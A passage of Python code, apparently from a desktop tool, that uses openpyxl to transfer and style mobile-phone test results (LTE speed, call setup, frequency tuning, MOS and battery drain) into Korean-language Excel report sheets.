sheet_out.merge_cells('A15:A17')\n sheet_out['A15'] = 'Band 7 20M(MCS28)'\n sheet_out['B15'] = 'RSSI'\n sheet_out['B16'] = '속도(Absolute)'\n sheet_out['B17'] = 'BLER'\n sheet_out['C15'] = '-60.00dBm'\n sheet_out['C16'] = '119900Kbps'\n sheet_out['C17'] = '20.00%'\n sheet_out['D15'] = list_lte_spd[9] + 'dBm'\n sheet_out['D16'] = list_lte_spd[10] + 'Kbps'\n sheet_out['D17'] = list_lte_spd[11] + '%'\n # sheet_out['E15'] = self.check_num(abs(round(abs(float(list_lte_spd[9])) - 60.00, 2))) + 'dBm'\n # sheet_out['E16'] = self.check_num(abs(round(abs(float(list_lte_spd[10])) - 119900, 2))) + 'Kbps'\n # sheet_out['E17'] = self.check_num(abs(round(abs(float(list_lte_spd[11])) - 20.00, 2))) + '%'\n sheet_out['E15'] = self.cal_comparison(60.00, list_lte_spd[9]) + 'dBm'\n sheet_out['E16'] = self.cal_comparison(119900.00, list_lte_spd[10]) + 'Kbps'\n sheet_out['E17'] = self.cal_comparison(20.00, list_lte_spd[11]) + '%'\n\n sheet_out.merge_cells('A18:A20')\n sheet_out['A18'] = 'Band 7 10M(MCS27)'\n sheet_out['B18'] = 'RSSI'\n sheet_out['B19'] = '속도(Absolute)'\n sheet_out['B20'] = 'BLER'\n sheet_out['C18'] = '-60.00dBm'\n sheet_out['C19'] = '50300Kbps'\n sheet_out['C20'] = '20.00%'\n sheet_out['D18'] = list_lte_spd[12] + 'dBm'\n sheet_out['D19'] = list_lte_spd[13] + 'Kbps'\n sheet_out['D20'] = list_lte_spd[14] + '%'\n # sheet_out['E18'] = self.check_num(abs(round(abs(float(list_lte_spd[12])) - 60.00, 2))) + 'dBm'\n # sheet_out['E19'] = self.check_num(abs(round(abs(float(list_lte_spd[13])) - 50300, 2))) + 'Kbps'\n # sheet_out['E20'] = self.check_num(abs(round(abs(float(list_lte_spd[14])) - 20.00, 2))) + '%'\n sheet_out['E18'] = self.cal_comparison(60.00, list_lte_spd[12]) + 'dBm'\n sheet_out['E19'] = self.cal_comparison(50300.00, list_lte_spd[13]) + 'Kbps'\n sheet_out['E20'] = self.cal_comparison(20.00, list_lte_spd[14]) + '%'\n\n\n # 22 ~ 23 row\n sheet_out['A22'] = '▣ CA 속도'\n sheet_out['A23'] = ' - LTE'\n\n # sheet row 24 and 42 handle\n sheet_out['A24'] = '구분'\n sheet_out.merge_cells('B24:C24')\n sheet_out['B24'] = '기준(Free)'\n sheet_out['D24'] = '측정결과'\n sheet_out['E24'] = '비교'\n\n sheet_out.merge_cells('A25:A27')\n sheet_out['A25'] = '2CA : B3+B5(MCS28)'\n sheet_out['B25'] = 'RSSI'\n sheet_out['B26'] = '속도(Absolute)'\n sheet_out['B27'] = 'BLER'\n sheet_out['C25'] = '-58.00dBm'\n sheet_out['C26'] = '178390Kbps'\n sheet_out['C27'] = '-'\n sheet_out['D25'] = list_lte_spd[15] + 'dBm'\n sheet_out['D26'] = list_lte_spd[16] + 'Kbps'\n sheet_out['D27'] = list_lte_spd[17] + '%'\n # sheet_out['E25'] = self.check_num(abs(round(abs(float(list_lte_spd[15])) - 58.00, 2))) + 'dBm'\n # sheet_out['E26'] = self.check_num(abs(round(abs(float(list_lte_spd[16])) - 178390, 2))) + 'Kbps'\n sheet_out['E25'] = self.cal_comparison(58.00, list_lte_spd[15]) + 'dBm'\n sheet_out['E26'] = self.cal_comparison(178390.00, list_lte_spd[16]) + 'Kbps'\n sheet_out['E27'] = '-'\n\n sheet_out.merge_cells('A28:A30')\n sheet_out['A28'] = '3CA : B7(20M)+B3+B1(MCS28)'\n sheet_out['B28'] = 'RSSI'\n sheet_out['B29'] = '속도(Absolute)'\n sheet_out['B30'] = 'BLER'\n sheet_out['C28'] = '-58.00dBm'\n sheet_out['C29'] = '327500Kbps'\n sheet_out['C30'] = '-'\n sheet_out['D28'] = list_lte_spd[18] + 'dBm'\n sheet_out['D29'] = list_lte_spd[19] + 'Kbps'\n sheet_out['D30'] = list_lte_spd[20] + '%'\n # sheet_out['E28'] = self.check_num(abs(round(abs(float(list_lte_spd[18])) - 58.00, 2))) + 'dBm'\n # sheet_out['E29'] = self.check_num(abs(round(abs(float(list_lte_spd[19])) - 327500, 2))) + 'Kbps'\n sheet_out['E28'] = self.cal_comparison(58.00, list_lte_spd[18]) + 'dBm'\n sheet_out['E29'] = self.cal_comparison(327500.00, list_lte_spd[19]) + 'Kbps'\n sheet_out['E30'] = '-'\n\n sheet_out.merge_cells('A31:A33')\n sheet_out['A31'] = '3CA : B7(20M)+B3+B5(MCS28)'\n sheet_out['B31'] = 'RSSI'\n sheet_out['B32'] = '속도(Absolute)'\n sheet_out['B33'] = 'BLER'\n sheet_out['C31'] = '-58.00dBm'\n sheet_out['C32'] = '298300Kbps'\n sheet_out['C33'] = '-'\n sheet_out['D31'] = list_lte_spd[21] + 'dBm'\n sheet_out['D32'] = list_lte_spd[22] + 'Kbps'\n sheet_out['D33'] = list_lte_spd[23] + '%'\n # sheet_out['E31'] = self.check_num(abs(round(abs(float(list_lte_spd[21])) - 58.00, 2))) + 'dBm'\n # sheet_out['E32'] = self.check_num(abs(round(abs(float(list_lte_spd[22])) - 298300, 2))) + 'Kbps'\n sheet_out['E31'] = self.cal_comparison(58.00, list_lte_spd[21]) + 'dBm'\n sheet_out['E32'] = self.cal_comparison(298300.00, list_lte_spd[22]) + 'Kbps'\n sheet_out['E33'] = '-'\n\n sheet_out.merge_cells('A34:A36')\n sheet_out['A34'] = '3CA : B7(20M)+B3+B7(MCS28)'\n sheet_out['B34'] = 'RSSI'\n sheet_out['B35'] = '속도(Absolute)'\n sheet_out['B36'] = 'BLER'\n sheet_out['C34'] = '-58.00dBm'\n sheet_out['C35'] = '298300Kbps'\n sheet_out['C36'] = '-'\n sheet_out['D34'] = list_lte_spd[24] + 'dBm'\n sheet_out['D35'] = list_lte_spd[25] + 'Kbps'\n sheet_out['D36'] = list_lte_spd[26] + '%'\n # sheet_out['E34'] = self.check_num(abs(round(abs(float(list_lte_spd[24])) - 58.00, 2))) + 'dBm'\n # sheet_out['E35'] = self.check_num(abs(round(abs(float(list_lte_spd[25])) - 298300, 2))) + 'Kbps'\n sheet_out['E34'] = self.cal_comparison(58.00, list_lte_spd[24]) + 'dBm'\n sheet_out['E35'] = self.cal_comparison(298300.00, list_lte_spd[25]) + 'Kbps'\n sheet_out['E36'] = '-'\n\n sheet_out.merge_cells('A37:A39')\n sheet_out['A37'] = '4CA : B7(20M)+B3+B5+B1(MCS28)'\n sheet_out['B37'] = 'RSSI'\n sheet_out['B38'] = '속도(Absolute)'\n sheet_out['B39'] = 'BLER'\n sheet_out['C37'] = '-57.00dBm'\n sheet_out['C38'] = '386000Kbps'\n sheet_out['C39'] = '-'\n sheet_out['D37'] = list_lte_spd[27] + 'dBm'\n sheet_out['D38'] = list_lte_spd[28] + 'Kbps'\n sheet_out['D39'] = list_lte_spd[29] + '%'\n # sheet_out['E37'] = self.check_num(abs(round(abs(float(list_lte_spd[27])) - 57.00, 2))) + 'dBm'\n # sheet_out['E38'] = self.check_num(abs(round(abs(float(list_lte_spd[28])) - 386000, 2))) + 'Kbps'\n sheet_out['E37'] = self.cal_comparison(57.00, list_lte_spd[27]) + 'dBm'\n sheet_out['E38'] = self.cal_comparison(386000.00, list_lte_spd[28]) + 'Kbps'\n sheet_out['E39'] = '-'\n\n sheet_out.merge_cells('A40:A42')\n sheet_out['A40'] = '5CA : B7+B3+B5+B1+B7(MCS28)'\n sheet_out['B40'] = 'RSSI'\n sheet_out['B41'] = '속도(Absolute)'\n sheet_out['B42'] = 'BLER'\n sheet_out['C40'] = '-56.00dBm'\n sheet_out['C41'] = '444500Kbps'\n sheet_out['C42'] = '-'\n sheet_out['D40'] = list_lte_spd[30] + 'dBm'\n sheet_out['D41'] = list_lte_spd[31] + 'Kbps'\n sheet_out['D42'] = list_lte_spd[32] + '%'\n # sheet_out['E40'] = self.check_num(abs(round(abs(float(list_lte_spd[30])) - 56.00, 2))) + 'dBm'\n # sheet_out['E41'] = self.check_num(abs(round(abs(float(list_lte_spd[31])) - 444500, 2))) + 'Kbps'\n sheet_out['E40'] = self.cal_comparison(56.00, list_lte_spd[30]) + 'dBm'\n sheet_out['E41'] = self.cal_comparison(444500.00, list_lte_spd[31]) + 'Kbps'\n sheet_out['E42'] = '-'\n\n self.setPrintText('/s {}번 파일 \"속도\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:E42\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A22'].alignment = self.top_alignment\n sheet_out['A23'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:E20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A24:E42\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:E42\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [20.63, 14, 14, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [6, 9, 12, 15, 18, 25, 28, 31, 34, 37, 40]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n for col in ['A', 'B', 'D', 'E']:\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '24'].fill = self.brown_fill\n\n for i in range(6, 21):\n sheet_out['B'+str(i)].fill = self.apricot_fill\n sheet_out['C'+str(i)].fill = self.apricot_fill\n\n for i in range(25, 43):\n sheet_out['B'+str(i)].fill = self.apricot_fill\n sheet_out['C'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"속도\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # Call Setup Tab\n def call_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n call_val = ''\n\n # get data from wb_input\n sheet_in = wb_input['Call Test']\n\n call_val = self.check_num(sheet_in['D8'].value)\n\n #option setting wb.output\n sheet_out = wb_output['Call Setup Test']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'Call Setup Test 결과'\n\n # 3~4 row\n sheet_out['A2'] = ' - WCDMA Call Setup Test'\n sheet_out['A3'] = '구분'\n sheet_out['B3'] = '기준'\n sheet_out['C3'] = '측정결과'\n sheet_out['D3'] = '비교'\n sheet_out['A4'] = 'Band 1'\n sheet_out['B4'] = ' -104.5dBm 이하'\n sheet_out['C4'] = call_val\n sheet_out['D4'] = '-'\n\n self.setPrintText('/s {}번 파일 \"Call Setuo Test\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D4\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A3:D4\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D4\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['A4'].fill = self.gray_fill\n\n for col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '3'].fill = self.brown_fill\n\n sheet_out['B4'].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"Call Setup Test\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 주파수동조 Tab\n def fre_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_c1 = []\n list_c2 = []\n list_c3 = []\n # get data from wb_input\n sheet_in = wb_input['주파수동조']\n\n for i in ['C', 'D', 'E', 'F']:\n list_c1.append(str(sheet_in[i + '5'].value))\n list_c1.append(str(sheet_in[i + '6'].value))\n list_c1.append(str(sheet_in[i + '7'].value))\n\n for i in ['C', 'D']:\n list_c2.append(str(sheet_in[i + '11'].value))\n list_c2.append(str(sheet_in[i + '12'].value))\n list_c2.append(str(sheet_in[i + '13'].value))\n\n for i in ['C', 'D', 'E', 'F']:\n list_c3.append(str(sheet_in[i + '17'].value))\n list_c3.append(str(sheet_in[i + '18'].value))\n list_c3.append(str(sheet_in[i + '19'].value))\n\n # option setting wb.output\n sheet_out = wb_output['주파수동조']\n\n # sheet row 2 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '주파수동조 결과'\n\n # 3~8 row\n sheet_out['A3'] = '▣ LTE'\n sheet_out.merge_cells('A4:B4')\n sheet_out['A4'] = '지원 Band 및 정보'\n sheet_out['C4'] = '측정결과'\n sheet_out['D4'] = '비고'\n i = 0\n j = 0\n while i < len(list_c1):\n\n sheet_out['A' + str(5 + j)] = list_c1[i]\n sheet_out['B' + str(5 + j)] = list_c1[i+1]\n sheet_out['C' + str(5 + j)] = list_c1[i+2]\n sheet_out['D' + str(5 + j)] = ''\n i = i + 3\n j = j + 1\n\n # 10~13 row\n sheet_out['A10'] = '▣ WCDMA'\n sheet_out.merge_cells('A11:B11')\n sheet_out['A11'] = '지원 Band 및 정보'\n sheet_out['C11'] = '측정결과'\n sheet_out['D11'] = '비고'\n i = 0\n j = 0\n while i < len(list_c2):\n sheet_out['A' + str(12 + j)] = list_c2[i]\n sheet_out['B' + str(12 + j)] = list_c2[i + 1]\n sheet_out['C' + str(12 + j)] = list_c2[i + 2]\n sheet_out['D' + str(12 + j)] = ''\n i = i + 3\n j = j + 1\n\n # 15~20 row\n sheet_out['A15'] = '▣ GMS'\n sheet_out.merge_cells('A16:B16')\n sheet_out['A16'] = '지원 Band 및 정보'\n sheet_out['C16'] = '측정결과'\n sheet_out['D16'] = '비고'\n i = 0\n j = 0\n while i < len(list_c3):\n sheet_out['A' + str(17 + j)] = list_c3[i]\n sheet_out['B' + str(17 + j)] = list_c3[i + 1]\n sheet_out['C' + str(17 + j)] = list_c3[i + 2]\n sheet_out['D' + str(17 + j)] = ''\n i = i + 3\n j = j + 1\n\n self.setPrintText('/s {}번 파일 \"주파수동조\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D20\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A10'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D8\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A11:D13\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A16:D20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n # all cell font adjust\n for mCell in sheet_out[\"A3:D20\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [15.13, 24.5, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [5, 6, 7, 8, 12, 13, 17, 18, 19, 20]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n for i in [4, 11, 16]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"주파수동조\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # Call Setup Tab\n def mos_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_val = []\n\n # get data from wb_input\n sheet_in = wb_input['MOS']\n list_val.append(self.check_num(sheet_in['C6'].value))\n list_val.append(self.check_num(sheet_in['D6'].value))\n list_val.append(self.check_num(sheet_in['E6'].value))\n list_val.append(self.check_num(sheet_in['F6'].value))\n\n #option setting wb.output\n sheet_out = wb_output['MOS']\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = 'MOS 결과'\n\n # sheet row 2 handle\n sheet_out['A2'] = '- MOS 결과'\n sheet_out['A3'] = '▣ POLQA_48K'\n\n # 4~6 row\n sheet_out['A4'] = '구분'\n sheet_out['B4'] = '기준'\n sheet_out['C4'] = '측정결과'\n sheet_out['D4'] = '비교'\n sheet_out['A5'] = 'Downlink MOS'\n sheet_out['B5'] = '3.5 이상'\n sheet_out['C5'] = list_val[0]\n # sheet_out['D5'] = self.check_num(abs(round(abs(float(list_val[0])) - 3.5, 2)))\n sheet_out['D5'] = self.cal_comparison(3.5, list_val[0])\n sheet_out['A6'] = 'Uplink MOS'\n sheet_out['B6'] = '3.5 이상'\n sheet_out['C6'] = list_val[1]\n # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_val[1])) - 3.5, 2)))\n sheet_out['D6'] = self.cal_comparison(3.5, list_val[1])\n\n # sheet row 8 handle\n sheet_out['A8'] = '▣ POLQA_8K'\n\n # 9~11 row\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준'\n sheet_out['C9'] = '측정결과'\n sheet_out['A10'] = 'Downlink MOS'\n sheet_out['B10'] = '3.0 이상'\n sheet_out['C10'] = list_val[2]\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_val[2])) - 3.0, 2)))\n sheet_out['D10'] = self.cal_comparison(3.0, list_val[2])\n sheet_out['A11'] = 'Uplink MOS'\n sheet_out['B11'] = '3.0 이상'\n sheet_out['C11'] = list_val[3]\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_val[3])) - 3.0, 2)))\n sheet_out['D11'] = self.cal_comparison(3.0, list_val[2])\n\n self.setPrintText('/s {}번 파일 \"MOS\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D11\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D6\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A9:D11\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D11\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 13.13]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 9]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 10, 11]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"MOS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # DOU Tab\n def dou_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n list_input = []\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n col_sum = list(range(4, 16))\n col_a = [1, 2, 4, 7, 13, 16, 17]\n col_b = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_c = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_d = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_e = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n i_sum = 0.0\n r_sum = 0.0\n t_sum = 0.0\n\n # get data from wb_input\n sheet_in = wb_input['배터리소모전류(DOU)']\n temp_data = []\n for i in col_a:\n if i == 1:\n temp_data.append(str(sheet_in['A' + str(i)].value))\n else:\n temp_data.append(str(sheet_in['A' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_b:\n temp_data.append(str(sheet_in['B' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_c:\n temp_data.append(str(sheet_in['C' + str(i + 1)].value))\n if i in col_sum:\n if self.isNumber(sheet_in['C' + str(i + 1)].value):\n t_sum = t_sum + float(sheet_in['C' + str(i + 1)].value)\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_d:\n if i in col_sum:\n if self.isNumber(sheet_in['D' + str(i + 1)].value):\n i_sum = i_sum + float(sheet_in['D' + str(i + 1)].value)\n temp_data.append(round(float(sheet_in['D' + str(i + 1)].value), 1))\n else:\n temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))\n else:\n temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_e:\n if i in col_sum:\n if self.isNumber(sheet_in['E' + str(i + 1)].value):\n r_sum = r_sum + float(sheet_in['E' + str(i + 1)].value)\n temp_data.append(round(float(sheet_in['E' + str(i + 1)].value), 1))\n else:\n temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))\n else:\n temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))\n list_input.append(temp_data)\n\n # input the data on output sheet\n sheet_out = wb_output['배터리소모전류(DOU)']\n\n for idx_2, item2 in enumerate(list_input):\n\n if idx_2 == 0:\n for i in range(len(item2)):\n sheet_out['A'+str(col_a[i])] = item2[i]\n elif idx_2 == 1:\n for i in range(len(item2)):\n sheet_out['B'+str(col_b[i])] = item2[i]\n elif idx_2 == 2:\n for i in range(len(item2)):\n sheet_out['C'+str(col_c[i])] = item2[i]\n elif idx_2 == 3:\n for i in range(len(item2)):\n sheet_out['D'+str(col_d[i])] = item2[i]\n else:\n for i in range(len(item2)):\n sheet_out['E'+str(col_e[i])] = item2[i]\n\n # fill rest values\n sheet_out.merge_cells('A1:E1')\n sheet_out.merge_cells('A2:A3')\n sheet_out.merge_cells('B2:B3')\n sheet_out.merge_cells('C2:C3')\n sheet_out.merge_cells('D2:E2')\n sheet_out.merge_cells('A4:A6')\n sheet_out.merge_cells('A7:A12')\n sheet_out.merge_cells('A13:A15')\n sheet_out.merge_cells('A16:B16')\n sheet_out.merge_cells('A17:C17')\n sheet_out.merge_cells('D17:E17')\n\n sheet_out['A16'] = '소계'\n if str(t_sum) == '0' or str(t_sum) == '0.0':\n sheet_out['C16'] = ''\n else:\n sheet_out['C16'] = round(t_sum, 1)\n\n if str(r_sum) == '0' or str(r_sum) == '0.0':\n sheet_out['E16'] = ''\n else:\n sheet_out['E16'] = round(r_sum, 1)\n\n if str(i_sum) == '0' or str(i_sum) == '0.0':\n sheet_out['D16'] = ''\n else:\n sheet_out['D16'] = round(i_sum, 1)\n\n sheet_out['A17'] = '사용시간'\n sheet_out['D17'] = str(round(self.battery_spec/r_sum, 2))+\"일\"\n\n self.setPrintText('/s {}번 파일 \"베터리소모전류(DOU)\" 테이터 입력 완료 /e'.format(idx+1))\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"A1:E17\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A2:E17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:E17\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [10.25, 27.38, 15.5, 17, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['A2'].fill = self.brown_fill\n sheet_out['B2'].fill = self.brown_fill\n sheet_out['C2'].fill = self.brown_fill\n sheet_out['D2'].fill = self.brown_fill\n sheet_out['D3'].fill = self.brown_fill\n sheet_out['E3'].fill = self.brown_fill\n sheet_out['A16'].fill = self.light_brown_fill\n sheet_out['C16'].fill = self.light_brown_fill\n sheet_out['D16'].fill = self.light_brown_fill\n sheet_out['E16'].fill = self.light_brown_fill\n sheet_out['A17'].fill = self.brown_fill\n sheet_out['D17'].fill = self.brown_fill\n\n for i in range(4, 16):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"베터리소모전류(DOU)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류 Tab\n def bat_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n col_out = ['Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB']\n\n # get data from wb_input\n sheet_in = wb_input['배터리소모전류']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류 세부데이터']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:P1')\n sheet_out['A1'] = '베터리소모전류 결과'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G 측정내역'\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '차수'\n sheet_out.merge_cells('B4:B5')\n sheet_out['B4'] = '시료번호'\n sheet_out.merge_cells('C4:C5')\n sheet_out['C4'] = '베터리용량'\n sheet_out.merge_cells('D4:D5')\n sheet_out['D4'] = '측정채널'\n sheet_out.merge_cells('E4:H4')\n sheet_out['E4'] = sheet_in['E8'].value\n sheet_out.merge_cells('I4:L4')\n sheet_out['I4'] = sheet_in['I8'].value\n sheet_out.merge_cells('M4:P4')\n sheet_out['M4'] = sheet_in['M8'].value\n\n sheet_out.merge_cells('E5:F5')\n sheet_out['E5'] = sheet_in['E9'].value\n sheet_out.merge_cells('G5:H5')\n sheet_out['G5'] = sheet_in['G9'].value\n sheet_out.merge_cells('I5:J5')\n sheet_out['I5'] = sheet_in['I9'].value\n sheet_out.merge_cells('K5:L5')\n sheet_out['K5'] = sheet_in['K9'].value\n sheet_out.merge_cells('M5:N5')\n sheet_out['M5'] = sheet_in['M9'].value\n sheet_out.merge_cells('O5:P5')\n sheet_out['O5'] = sheet_in['O9'].value\n\n # sheet row 6~7 handle\n sheet_out.merge_cells('A6:D7')\n 